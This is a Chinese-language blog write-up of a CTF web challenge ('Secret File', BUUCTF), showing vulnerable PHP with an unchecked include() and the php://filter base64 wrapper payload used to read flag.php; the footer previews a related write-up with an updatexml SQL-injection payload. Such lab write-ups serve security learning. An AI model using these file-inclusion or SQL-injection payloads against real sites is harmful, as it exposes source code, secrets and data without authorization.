[极客大挑战 2019]Secret File


打开环境

查看源代码,发现一个页面


跳转过去

点一下secret

看到这个页面果断上burp
得到另一个页面

跳转过去得到代码

<?php
    highlight_file(__FILE__);
    error_reporting(0);
    $file=$_GET['file'];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
        echo "Oh no!";
        exit();
    }
    include($file); 
//flag放在了flag.php里
?>

根据程序,我们要传入一个file参数为flag.php
然而却回显了这么一个页面

有点懵
burp上查看一下
也没有
看看控制台的属性是不是设置成hidden了
同样也没有
真的气,到最后一步了却找不到flag
好久之后才想起来flag.php,一个php文件,那我们可以读它的源码啊

http://22795964-60ec-4bea-9b8c-6b944c4ea759.node3.buuoj.cn/secr3t.php?file=php://filter/convert.base64-encode/resource=flag.php 

果然,返回了flag.php的base64编码,随后解码就可以得到flag

哎,说到底还是太菜,经验也少


文章作者: Lock
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Lock !
评论
 上一篇
[BUUCTF 2018]Online Tool [BUUCTF 2018]Online Tool
打开环境直接给出源代码,代码审计 <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_
2020-02-09
下一篇 
[网鼎杯 2018]Fakebook [网鼎杯 2018]Fakebook
打开环境注册一个账号,登陆进去 查看页面源代码有一个view.php?no=1的页面,看起来可以sql注入加个单引号测试报错那么报错注入走一波 ?no=1 and updatexml(1,concat('~',(select databa
2020-02-09
  目录